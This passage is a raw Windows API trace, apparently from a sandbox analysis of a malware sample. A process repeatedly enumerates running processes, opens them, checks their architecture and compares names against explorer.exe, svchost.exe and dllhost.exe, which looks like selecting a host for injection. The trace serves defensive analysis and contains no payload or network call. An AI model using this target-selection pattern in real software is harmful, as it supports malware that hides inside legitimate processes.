th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0232.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0232.463] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0232.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0232.463] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0232.464] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0232.464] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0232.465] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0232.465] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0232.466] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0232.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0232.467] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0232.467] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0232.468] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0232.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0232.468] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.468] CloseHandle (hObject=0xd8) returned 1 [0232.468] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0232.468] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0232.468] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0232.468] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0232.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0232.469] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0232.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0232.469] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.469] CloseHandle (hObject=0xd8) returned 1 [0232.469] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0232.469] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0232.469] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0232.469] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0232.470] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0232.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0232.470] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0232.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0232.471] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.471] CloseHandle (hObject=0xd8) returned 1 [0232.471] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0232.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0232.471] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.472] CloseHandle (hObject=0xd8) returned 1 [0232.472] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0232.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0232.472] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.472] CloseHandle (hObject=0xd8) returned 1 [0232.472] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0232.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0232.473] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.473] CloseHandle (hObject=0xd8) returned 1 [0232.473] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0232.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0232.473] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.473] CloseHandle (hObject=0xd8) returned 1 [0232.473] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0232.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0232.474] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.474] CloseHandle (hObject=0xd8) returned 1 [0232.474] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0232.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0232.474] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.474] CloseHandle (hObject=0xd8) returned 1 [0232.474] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0232.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0232.475] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.475] CloseHandle (hObject=0xd8) returned 1 [0232.475] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0232.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0232.475] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.476] CloseHandle (hObject=0xd8) returned 1 [0232.476] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0232.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0232.476] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.476] CloseHandle (hObject=0xd8) returned 1 [0232.476] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0232.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0232.477] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.477] CloseHandle (hObject=0xd8) returned 1 [0232.477] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0232.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0232.477] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.477] CloseHandle (hObject=0xd8) returned 1 [0232.477] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0232.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0232.478] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.478] CloseHandle (hObject=0xd8) returned 1 [0232.478] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0232.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0232.478] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.478] CloseHandle (hObject=0xd8) returned 1 [0232.479] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0232.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0232.479] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.479] CloseHandle (hObject=0xd8) returned 1 [0232.479] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0232.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0232.480] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.480] CloseHandle (hObject=0xd8) returned 1 [0232.480] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0232.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0232.480] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.480] CloseHandle (hObject=0xd8) returned 1 [0232.480] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0232.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0232.481] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.481] CloseHandle (hObject=0xd8) returned 1 [0232.481] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0232.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0232.481] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.481] CloseHandle (hObject=0xd8) returned 1 [0232.481] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0232.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0232.482] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.482] CloseHandle (hObject=0xd8) returned 1 [0232.482] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0232.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0232.483] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.483] CloseHandle (hObject=0xd8) returned 1 [0232.483] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0232.483] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0232.484] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0232.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0232.484] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0232.485] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0232.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0232.485] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0232.486] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.486] CloseHandle (hObject=0xd8) returned 1 [0232.486] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0232.486] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0232.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0232.486] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.486] CloseHandle (hObject=0xd8) returned 1 [0232.486] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0232.486] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0232.486] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0232.486] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0232.487] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0232.487] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.487] CloseHandle (hObject=0xd8) returned 1 [0232.487] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0232.488] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.488] CloseHandle (hObject=0xd8) returned 1 [0232.488] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0232.488] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0232.489] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0232.489] CloseHandle (hObject=0xd8) returned 1 [0232.489] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.489] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0232.490] CloseHandle (hObject=0xd4) returned 1 [0232.490] Sleep (dwMilliseconds=0x3e8) [0233.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0233.526] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0233.526] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0233.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0233.527] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, 